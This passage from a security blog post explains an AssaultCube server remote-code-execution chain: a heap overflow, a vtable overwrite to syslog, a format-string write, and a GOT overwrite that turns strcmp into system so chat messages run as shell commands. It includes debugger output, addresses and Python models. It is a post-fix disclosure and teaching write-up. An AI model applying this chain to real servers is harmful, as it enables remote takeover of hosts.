<span class="k">return</span> <span class="n">msg</span> <span class="o">>=</span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">msg</span> <span class="o"><</span> <span class="n">SV_NUM</span> <span class="o">?</span> <span class="n">sizetable</span><span class="p">[</span><span class="n">msg</span><span class="p">]</span> <span class="o">:</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
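<p>For readers who find the pointer walk hard to follow, here is a rough Python port of the same lookup. The event IDs and the shortened table are made up for illustration (the real values come from AssaultCube’s <code class="language-plaintext highlighter-rouge">SV_*</code> enum), and <code class="language-plaintext highlighter-rouge">SV_UNLISTED</code> is a hypothetical event that is deliberately missing from the table.</p>

```python
# Hypothetical numeric IDs; the real ones come from the SV_* enum.
SV_SERVINFO, SV_WELCOME, SV_TEXT, SV_SOUND, SV_THROWNADE, SV_UNLISTED, SV_NUM = range(7)

# Flat (type, size) pairs terminated by -1, mirroring the layout of msgsizes[].
MSGSIZES = [SV_SERVINFO, 5, SV_WELCOME, 2, SV_TEXT, 0, SV_SOUND, 2, SV_THROWNADE, 8, -1]

_sizetable = None  # built lazily on the first lookup, like the static array


def msgsizelookup(msg):
    global _sizetable
    if _sizetable is None:
        _sizetable = [-1] * SV_NUM  # same effect as memset(sizetable, -1, ...)
        i = 0
        while MSGSIZES[i] >= 0:  # stop at the -1 terminator
            _sizetable[MSGSIZES[i]] = MSGSIZES[i + 1]
            i += 2
    return _sizetable[msg] if 0 <= msg < SV_NUM else -1


# Events with a strictly positive size survive the `size <= 0` check in the default case.
usable = [t for t in range(SV_NUM) if msgsizelookup(t) > 0]
print(usable)
```

<p>Anything that is out of range or missing from the table comes back as <code class="language-plaintext highlighter-rouge">-1</code>, and anything listed with <code class="language-plaintext highlighter-rouge">0</code> is rejected by the same <code class="language-plaintext highlighter-rouge">size &lt;= 0</code> check.</p>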
<p>I made a list of all the <a href="https://github.com/elongl/AC/blob/research/egk/events">events</a> that I can send without getting disconnected (the lookup doesn’t return -1) and whose size is also bigger than 0. This is what I ended up with:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SV_SOUND (2), SV_THROWNADE (8), SV_GAMEMODE (2)
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">SV_SOUND</code> & <code class="language-plaintext highlighter-rouge">SV_GAMEMODE</code> are too small to write any pointer, though <code class="language-plaintext highlighter-rouge">SV_THROWNADE</code> is sufficient! You might be wondering: if you can send several events in the same cycle, what’s the problem with simply triggering <code class="language-plaintext highlighter-rouge">SV_SOUND</code> multiple times? Well, the thing is that the event type itself is also written into the <code class="language-plaintext highlighter-rouge">messages</code> buffer.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">type</span> <span class="o">=</span> <span class="n">checktype</span><span class="p">(</span><span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">),</span> <span class="n">cl</span><span class="p">);</span> <span class="c1">// Reading the event type.</span>
</code></pre></div></div>
<p>So that won’t fly because there will be “noise” in between.</p>
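<p>Here is a small model of that “noise”. It is a sketch under loud assumptions: the event IDs are invented, every integer is treated as a single byte, and <code class="language-plaintext highlighter-rouge">process</code> only imitates the <code class="language-plaintext highlighter-rouge">default</code> case shown earlier. The sizes (2 and 8) are the ones listed above.</p>

```python
SV_SOUND, SV_THROWNADE = 0x10, 0x11  # hypothetical IDs
SIZES = {SV_SOUND: 2, SV_THROWNADE: 8}  # sizes include the type token itself


def process(packet):
    """Model of the default case: read a type, skip size - 1 ints, queue it all."""
    messages = bytearray()
    pos = 0
    while pos < len(packet):
        start = pos
        msg_type = packet[pos]  # the event type is consumed from the packet...
        pos += 1
        pos += SIZES[msg_type] - 1  # ...followed by size - 1 one-byte integers
        messages += packet[start:pos]  # QUEUE_MSG copies the type byte as well
    return bytes(messages)


payload = b"ABCDEFG"  # 7 bytes we would like to appear back to back

# Attempt 1: one SV_SOUND per payload byte. A type byte lands between each pair.
many_sounds = b"".join(bytes([SV_SOUND, b]) for b in payload)
queued_sounds = process(many_sounds)

# Attempt 2: a single SV_THROWNADE carries all 7 bytes contiguously.
one_nade = bytes([SV_THROWNADE]) + payload
queued_nade = process(one_nade)

print(payload in queued_sounds, payload in queued_nade)
```

<p>Only the single larger event leaves the payload contiguous in the queued buffer.</p>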
<p>Great! Now we can write 7 (size - 1) bytes in a row to <code class="language-plaintext highlighter-rouge">messages</code>, which in practice means that we can call <strong>any</strong> imported function now.</p>
<p><img src="https://cdn-images-1.medium.com/max/2970/1*3PsOuKZfDRFeyDKxA6Ok7g.png" alt="A peek into the binary's imported functions." /><em>A peek into the binary’s imported functions.</em></p>
<p>After browsing for a while, looking for a function to call within the program with the second argument under my control, I noticed <strong>syslog</strong>.</p>
<p>From its signature, <code class="language-plaintext highlighter-rouge">void syslog(int priority, const char *format, ...);</code><br />
we can see that its second argument is a format string.
If we take a look at <code class="language-plaintext highlighter-rouge">man 3 syslog</code> we’d see:</p>
<blockquote>
<p>The remaining arguments are a format, as in printf(3),</p>
</blockquote>
<p>I assume most of you are familiar with format string attacks. If not, give it a read <a href="http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf">here</a> or Google it.</p>
<p>This is awesome!
It can potentially be escalated into an arbitrary write<em>-ish</em>.</p>
<p>I padded <code class="language-plaintext highlighter-rouge">messages</code> with <code class="language-plaintext highlighter-rouge">AAA...</code> until I reached the vtable’s memory,
at which point I sent the <code class="language-plaintext highlighter-rouge">SV_THROWNADE</code> and wrote <code class="language-plaintext highlighter-rouge">syslog</code>’s address. Then I took a look at the stack to see what interesting pointers were there, and which memory I could write to.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg> b syslog if strstr(fmt, "hello")
pwndbg> stack 500
00:0000│ rsp 0x7ffc5044d418 —▸ 0x40fc22 (buildworldstate()+946) ◂— mov rdi, qword ptr [rip + 0x3fa77]
01:0008│ 0x7ffc5044d420 —▸ 0x1790c40 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
02:0010│ 0x7ffc5044d428 ◂— 0x1b
03:0018│ 0x7ffc5044d430 —▸ 0x1790c58 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
04:0020│ 0x7ffc5044d438 —▸ 0x1790c48 —▸ 0x178ed30 ◂— 0x50e031e7c2800004
05:0028│ 0x7ffc5044d440 —▸ 0x1790c54 ◂— 0x1790a400000000a /* '\n' */
06:0030│ 0x7ffc5044d448 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
07:0038│ r10 0x7ffc5044d450 —▸ 0x17a63d0 ◂— 0x4af802f02c1802f
08:0040│ r9 0x7ffc5044d458 —▸ 0x1790c40 —▸ 0x1790a40 ◂— 0x2f02c1802f180058 /* 'X' */
09:0048│ rsi-4 0x7ffc5044d460 ◂— 0x553b00000000
0a:0050│ 0x7ffc5044d468 ◂— 0xa00000000
0b:0058│ 0x7ffc5044d470 —▸ 0x17a9070 —▸ 0x1791830 —▸ 0x1790f40 —▸ 0x17970d0 ◂— ...
0c:0060│ 0x7ffc5044d478 ◂— 0xa9
0d:0068│ 0x7ffc5044d480 —▸ 0x7ffc5044d4b0 ◂— 0x7f9800000003
0e:0070│ 0x7ffc5044d488 ◂— 0x1
0f:0078│ 0x7ffc5044d490 ◂— 0x5
10:0080│ 0x7ffc5044d498 —▸ 0x7ffc5044d4d0 ◂— '192.168.1.40'
...
</code></pre></div></div>
<p>Unfortunately, on the stack itself there wasn’t any buffer that I can control.<br />
This is where I had to get creative.</p>
<p>While there isn’t any buffer that I can write to on the stack at that moment of the execution, there are a lot of pointers on the stack to other locations on the <strong>stack</strong> itself. What I decided to do is use one of those pointers to write an address of my choice into another stack slot, and then write through that second slot, which now points wherever I want.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Goal: Write VAL into ADDR.
// Stack
A -> B
B -> C
1. Write ADDR onto the stack using A.
A -> B
B -> ADDR <- ????
2. Write VAL into ADDR using B.
A -> B
B -> ADDR <- VAL
</code></pre></div></div>
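<p>The two steps can be simulated with a toy <code class="language-plaintext highlighter-rouge">printf</code>. This is a sketch, not the actual exploit code: <code class="language-plaintext highlighter-rouge">fake_printf</code> is a hypothetical helper that understands only <code class="language-plaintext highlighter-rouge">%k$&lt;width&gt;c</code> and <code class="language-plaintext highlighter-rouge">%k$n</code>, the stack addresses and argument positions are invented, and write widths (<code class="language-plaintext highlighter-rouge">%n</code> vs <code class="language-plaintext highlighter-rouge">%ln</code>) are ignored. The two constants are the <code class="language-plaintext highlighter-rouge">strcmp@got</code> and <code class="language-plaintext highlighter-rouge">system@plt</code> addresses shown later in the post.</p>

```python
import re

# Only two directives are modeled: %k$<width>c (prints <width> characters)
# and %k$n (stores the number of characters printed so far via argument k).
TOKEN = re.compile(r"%(\d+)\$(\d+)c|%(\d+)\$n")


def fake_printf(fmt, memory, slots):
    # Arguments are read off the stack slots at call time.
    args = [memory[slot] for slot in slots]
    written = 0
    for _pad_arg, width, n_arg in TOKEN.findall(fmt):
        if width:
            written += int(width)
        else:
            # The chosen argument is treated as a pointer and written through.
            memory[args[int(n_arg) - 1]] = written
    return written


SLOTS = [0x7FFC0000 + 8 * i for i in range(6)]  # made-up stack slot addresses
A, B = SLOTS[1], SLOTS[4]  # argument positions 2 and 5 (hypothetical)
memory = {slot: 0 for slot in SLOTS}
memory[A] = B  # A -> B: a stack slot that points at another stack slot

ADDR, VAL = 0x446288, 0x4032D0  # goal: write VAL into ADDR

# Step 1: through A, overwrite the contents of B with ADDR.
fake_printf(f"%1${ADDR}c%2$n", memory, SLOTS)
# Step 2: in a second call, B is an argument that now points at ADDR.
fake_printf(f"%1${VAL}c%5$n", memory, SLOTS)

print(hex(memory[B]), hex(memory[ADDR]))
```

<p>The model uses two separate calls, so that the second one re-reads the stack and sees the pointer planted by the first.</p>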
<p>Frankly, this turned out to be easier than I thought.<br />
It’s important to mention that there’s a certain limitation to how much padding you can do using a format string attack, so I couldn’t use that for a <em>full</em> arbitrary write but I could definitely write to the executable’s memory space.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>pwndbg> vmmap
// Integers that big can't be written.
0x7febe5a3e000 0x7febe5a63000 r--p 25000 0 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5a63000 0x7febe5bdb000 r-xp 178000 25000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5bdb000 0x7febe5c25000 r--p 4a000 19d000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5c25000 0x7febe5c26000 ---p 1000 1e7000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
0x7febe5c26000 0x7febe5c29000 r--p 3000 1e7000 /usr/lib/x86_64-linux-gnu/libc-2.31.so
// Those definitely can!
0x400000 0x403000 r--p 3000 0 AC/bin_unix/native_server
0x403000 0x437000 r-xp 34000 3000 AC/bin_unix/native_server
0x437000 0x444000 r--p d000 37000 AC/bin_unix/native_server
0x445000 0x446000 r--p 1000 44000 AC/bin_unix/native_server
0x446000 0x448000 rw-p 2000 45000 AC/bin_unix/native_server
</code></pre></div></div>
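<p>A quick back-of-the-envelope check of that limitation. The exact ceiling is an assumption on my part: I’m taking it to be around <code class="language-plaintext highlighter-rouge">INT_MAX</code>, since the character count that <code class="language-plaintext highlighter-rouge">%n</code> stores is the same count the printf family reports as an <code class="language-plaintext highlighter-rouge">int</code>. The addresses are taken from the listings in this post.</p>

```python
INT_MAX = 2**31 - 1  # assumed ceiling for the number of characters one call can emit


def writable_with_percent_n(value):
    # %n stores "characters printed so far", so the value we want to write
    # is also the amount of padding we need to print first.
    return 0 <= value <= INT_MAX


targets = {
    "strcmp@got": 0x446288,
    "system@plt": 0x4032D0,
    "libc mapping": 0x7FEBE5A63000,
}
results = {name: writable_with_percent_n(value) for name, value in targets.items()}

for name, ok in results.items():
    print(f"{name:13} {targets[name]:#016x} padding={targets[name]:>16,} ok={ok}")
```

<p>Addresses inside the non-PIE executable need a few million characters of padding, which is feasible, while a libc address would need on the order of 10<sup>14</sup>.</p>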
<p>Amazing.<br />
Now we have arbitrary write to the executable’s memory space.<br />
What do we write and to where?</p>
<p>I went to the <code class="language-plaintext highlighter-rouge">.got.plt</code> section, and searched for functions that I can pass a buffer to as the first argument so that it’ll be properly set for</p>
<p><code class="language-plaintext highlighter-rouge">int system (const char *command)</code></p>
<p>I went to the event handler of the text messages, <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2829">SV_TEXT</a>, and saw which libc functions are being used, and more specifically, those whose first argument is the text message itself.</p>
<p>It needed to be accurate enough so that it doesn’t affect / break the rest of the server’s logic and cause it to crash, so preferably not a function that gets called every second or something.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">case</span> <span class="n">SV_TEXTME</span><span class="p">:</span>
<span class="k">case</span> <span class="n">SV_TEXT</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">mid1</span> <span class="o">=</span> <span class="n">curmsg</span><span class="p">,</span> <span class="n">mid2</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="n">getstring</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">p</span><span class="p">);</span>
<span class="n">filtertext</span><span class="p">(</span><span class="n">text</span><span class="p">,</span> <span class="n">text</span><span class="p">);</span>
<span class="n">trimtrailingwhitespace</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">*</span><span class="n">text</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">canspeech</span> <span class="o">=</span> <span class="n">forbiddenlist</span><span class="p">.</span><span class="n">canspeech</span><span class="p">(</span><span class="n">text</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">spamdetect</span><span class="p">(</span><span class="n">cl</span><span class="p">,</span> <span class="n">text</span><span class="p">)</span> <span class="o">&&</span> <span class="n">canspeech</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
</code></pre></div></div>
<p>At <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L1283">spamdetect</a>, there’s a call to <code class="language-plaintext highlighter-rouge">strcmp</code> that checks if the message that is being processed is equivalent to the message that was last sent, obviously to avoid spamming.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if(text[0] && !strcmp(text, cl->lastsaytext) && servmillis - cl->lastsay < SPAMREPEATINTERVAL*1000)
</code></pre></div></div>
<p>This is the perfect fit.</p>
<p>Using the format string attack, I <a href="https://github.com/elongl/AC/blob/research/source/src/client.cpp#L279">wrote</a> <code class="language-plaintext highlighter-rouge">system@plt</code> into <code class="language-plaintext highlighter-rouge">strcmp@got</code> so that whenever strcmp is called, it’ll actually jump to system.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">In</span> <span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="n">p</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">'strcmp'</span><span class="p">]</span>
<span class="n">Out</span><span class="p">[</span><span class="mi">1</span><span class="p">]:</span> <span class="mi">4481672</span> <span class="p">(</span><span class="mh">0x446288</span><span class="p">)</span>
<span class="n">In</span> <span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="n">p</span><span class="p">.</span><span class="n">plt</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span>
<span class="n">Out</span><span class="p">[</span><span class="mi">2</span><span class="p">]:</span> <span class="mi">4207312</span> <span class="p">(</span><span class="mh">0x4032d0</span><span class="p">)</span>
</code></pre></div></div>
<p>Now, when I send a text message, it is passed through <code class="language-plaintext highlighter-rouge">spamdetect</code>, and the call to <code class="language-plaintext highlighter-rouge">strcmp</code> would in fact run the text message as a shell command.</p>
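<p>Conceptually, the GOT is just a table of function pointers that every call goes through. The following toy model (all names are hypothetical, and <code class="language-plaintext highlighter-rouge">fake_system</code> only records the command instead of running it) shows why overwriting one entry redirects the call inside <code class="language-plaintext highlighter-rouge">spamdetect</code>, with the text message as the first argument. The timing condition of the real check is left out.</p>

```python
def real_strcmp(a, b):
    # Same contract as strcmp: negative, zero or positive.
    return (a > b) - (a < b)


executed = []


def fake_system(command, *ignored):
    # Stand-in for system(): records the command instead of running it.
    # Extra arguments are ignored, just as system() never looks at them.
    executed.append(command)
    return 0


got = {"strcmp": real_strcmp}  # toy Global Offset Table


def strcmp(a, b):
    # Models the PLT stub: every call is an indirect jump through the GOT slot.
    return got["strcmp"](a, b)


def spamdetect(text, lastsaytext):
    # Simplified version of the check quoted above.
    return bool(text) and strcmp(text, lastsaytext) == 0


before = spamdetect("hello", "hello")  # normal behavior: a repeated message

got["strcmp"] = fake_system  # the format string write, modeled as an assignment

spamdetect("xcalc", "hello")  # the "comparison" now runs our text as a command
print(before, executed)
```

<p>Nothing in <code class="language-plaintext highlighter-rouge">spamdetect</code> itself changed; only the table entry did.</p>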
<p>How cool is that?!</p>
<p>Let’s take a look.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/ncjvUTq5dco" frameborder="0" allowfullscreen=""></iframe></center>
<h3 id="steps">Steps</h3>
<p>A. Overflow <code class="language-plaintext highlighter-rouge">messages</code> into <code class="language-plaintext highlighter-rouge">demorecord</code> and overwrite the vtable to <code class="language-plaintext highlighter-rouge">syslog</code>.<br />
B. Place <code class="language-plaintext highlighter-rouge">strcmp@got</code> on the stack using the format string attack.<br />
C. Write <code class="language-plaintext highlighter-rouge">system@plt</code> into the <code class="language-plaintext highlighter-rouge">strcmp@got</code> using the format string attack.<br />
D. Run the command that pops a calculator by simply sending a text message.</p>
<p>You might be wondering why the hell I’m launching another client.<br />
Well, that’s a legitimate question.</p>
<p>The reason is right here.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">empty</span><span class="p">())</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">SV_CLIENT</span><span class="p">);</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">clientnum</span><span class="p">);</span> <span class="c1">// c.clientnum == 0</span>
<span class="n">putuint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">put</span><span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msglen</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">()</span> <span class="o">-</span> <span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">setsize</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Because I’m the first client to connect to the server,
my index at the <code class="language-plaintext highlighter-rouge">clients</code> vector, as well as my <code class="language-plaintext highlighter-rouge">clientnum</code> is <code class="language-plaintext highlighter-rouge">0</code>.
This becomes a problem when your buffer is a null-terminated string.</p>
<p>In the format attack which we discussed earlier,
we’re sending the format as a text message that is appended to the <code class="language-plaintext highlighter-rouge">worldstate</code>, that is later passed to <code class="language-plaintext highlighter-rouge">syslog</code>.
I’m forced to send the formats <strong>not</strong> from the first client because the string will terminate after the first character (<code class="language-plaintext highlighter-rouge">SV_CLIENT</code>).</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">SV_CLIENT</span><span class="p">);</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">clientnum</span><span class="p">);</span> <span class="c1">// clientnum is 0.</span>
<span class="c1">// syslog's format would be - "{SV_CLIENT}\x00".</span>
</code></pre></div></div>
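<p>A short sketch of the truncation, assuming each of the three header integers is encoded as a single byte and using an invented value for <code class="language-plaintext highlighter-rouge">SV_CLIENT</code>. <code class="language-plaintext highlighter-rouge">worldstate_entry</code> and <code class="language-plaintext highlighter-rouge">as_c_string</code> are hypothetical helpers that mimic what the server appends and what <code class="language-plaintext highlighter-rouge">syslog</code> would read as its format.</p>

```python
SV_CLIENT = 0x2A  # hypothetical ID; any non-zero byte behaves the same


def worldstate_entry(clientnum, payload):
    # Mirrors the three put calls: SV_CLIENT, clientnum, length, then the data.
    # Assumption: every header value is small enough to fit in one byte.
    return bytes([SV_CLIENT, clientnum, len(payload)]) + payload


def as_c_string(buf):
    # What a C function sees when it treats the buffer as a string.
    return buf.split(b"\x00", 1)[0]


fmt = b"%1$4481672c%2$n"  # illustrative format string

seen_from_first_client = as_c_string(worldstate_entry(0, fmt))
seen_from_second_client = as_c_string(worldstate_entry(1, fmt))

print(seen_from_first_client)
print(seen_from_second_client)
```

<p>With <code class="language-plaintext highlighter-rouge">clientnum == 0</code> the string ends right after <code class="language-plaintext highlighter-rouge">SV_CLIENT</code>; with any other client number the format survives intact.</p>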
<h2 id="summary">Summary</h2>
<p>Let’s review the exploit.</p>
<ol>
<li>
<p>Using the initial vulnerability, overwrite the <code class="language-plaintext highlighter-rouge">alen</code> (capacity) of the <code class="language-plaintext highlighter-rouge">messages</code> vector with a value bigger than it can actually hold.</p>
</li>
<li>
<p>Overwrite the vtable by overflowing the heap into <code class="language-plaintext highlighter-rouge">demorecord</code> so that <code class="language-plaintext highlighter-rouge">demorecord->write</code> calls <code class="language-plaintext highlighter-rouge">syslog</code>.</p>
</li>
<li>
<p>Connect with another client, and exploit <code class="language-plaintext highlighter-rouge">syslog</code>’s format string to write the address of <code class="language-plaintext highlighter-rouge">strcmp@got</code> to the stack, and then write <code class="language-plaintext highlighter-rouge">system@plt</code> to it.</p>
</li>
<li>
<p>Run a shell command by simply sending a text message.</p>
</li>
</ol>
<h2 id="conclusion">Conclusion</h2>
<p>This game is definitely still being played, not that you’d start playing it today, but there are still some old-schoolers around.</p>
<p><img src="https://cdn-images-1.medium.com/max/2600/1*ZypJYHnnMMs0jTYum_LHcw.png" alt="Server Browser (can also scroll for more)" /><em>Server Browser (can also scroll for more)</em></p>
<p>I find it fascinating that from the developers’ point of view, the <strong>only</strong> vulnerability that I’ve exploited is:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">if</span> <span class="p">(</span><span class="n">nextprimary</span> <span class="o"><</span> <span class="mi">0</span> <span class="o">&&</span> <span class="n">nextprimary</span> <span class="o">>=</span> <span class="n">NUMGUNS</span><span class="p">)</span> <span class="c1">// This should've been an OR operator, not an AND.</span>
</code></pre></div></div>
<p>They literally got confused <strong>once</strong>, a single incorrect operator, and we have code execution.</p>
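<p>To see why that condition is dead code, here is a tiny check. The value of <code class="language-plaintext highlighter-rouge">NUMGUNS</code> is made up; any positive constant gives the same result.</p>

```python
NUMGUNS = 10  # hypothetical value


def buggy_is_invalid(nextprimary):
    # A number cannot be negative AND at least NUMGUNS at the same time.
    return nextprimary < 0 and nextprimary >= NUMGUNS


def fixed_is_invalid(nextprimary):
    return nextprimary < 0 or nextprimary >= NUMGUNS


candidates = range(-1000, 1000)
buggy_rejects = [n for n in candidates if buggy_is_invalid(n)]
fixed_rejects = [n for n in candidates if fixed_is_invalid(n)]

print(len(buggy_rejects), len(fixed_rejects))
```

<p>The buggy check rejects nothing at all, so every out-of-range index sails through.</p>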
<p>The rest is pure creativity.</p>
<p>I can only say that this has been a more educational experience than all the CTFs I’ve done <strong>combined</strong>. They did give me a good sense of how to approach problems, but I’m glad I took a turn into this.</p>
<p>Needless to say, there was struggle and <em>a lot</em> of research in between that I did not elaborate on and that eventually wasn’t utilized. The whole process wasn’t as effortless as it is presented in this article, and there are a lot of smaller details that I simply left out because they’re just not interesting.</p>
<p>Since people have been asking, <strong>the bug has already been fixed.</strong><br />
Both <a href="https://github.com/assaultcube/AC/blob/master/source/src/server.cpp#L2783">here</a>, and <a href="https://github.com/assaultcube/AC/blob/master/source/src/server.cpp#L3108">here</a>. Would also mention that I deleted my fork of AssaultCube according to the developer’s request.</p>
<p>If you have any questions or suggestions, feel free to reach me through any of these channels or in the comments.</p>
<p><a href="mailto:elongliks@gmail.com">Email</a> , <a href="https://github.com/elongl">Github</a> , <a href="https://twitter.com/elongli">Twitter</a></p>
<p>Thanks for reading.</p>
<h2 id="easter-egg">Easter Egg</h2>
<p>The vulnerability was <a href="https://github.com/assaultcube/AC/commit/9ea5997f535da18a94a5c46bc1e88708f50b95e9">introduced</a> on my birthday.
Guess it was meant to be.</p>
<h2 id="references--mentions">References & Mentions</h2>
<ul>
<li><a href="https://www.google.com/search?q=assaultcube+rce">Google</a></li>
<li><a href="https://twitter.com/search?q=url%3Ae12dedf680e5&source=post_stats_page-------------------------------------">Twitter</a></li>
<li><a href="https://www.facebook.com/search/top/?q=AssaultCube%20RCE%3A%20Technical%20Analysis&source=post_stats_page-------------------------------------">Facebook</a></li>
<li><a href="https://podcasts.google.com/feed/aHR0cHM6Ly9hbmNob3IuZm0vcy9hMTIxYTI0L3BvZGNhc3QvcnNz/episode/OGVmNjY0ODEtNzMxNS00MTQ4LTgyZjgtOTNjYTM4M2UzNzFk?sa=X&ved=0CAIQuIEEahcKEwjwtIXHioDtAhUAAAAAHQAAAAAQRw">Day0 Podcast</a> & <a href="https://podcasts.google.com/feed/aHR0cHM6Ly9hbmNob3IuZm0vcy8zN2ZiM2U3MC9wb2RjYXN0L3Jzcw/episode/NDVlMmQ1NzMtZjRlOS00N2Y2LTg1YzctZjNmYTQwNDBhNjhk?sa=X&ved=0CAIQuIEEahcKEwjwtIXHioDtAhUAAAAAHQAAAAAQRw">GreyHats Podcast</a></li>
<li><a href="https://www.linkedin.com/search/results/content/?keywords=AssaultCube%20RCE%3A%20Technical%20Analysis&source=post_stats_page-------------------------------------">Linkedin</a></li>
</ul>(Also available on Medium)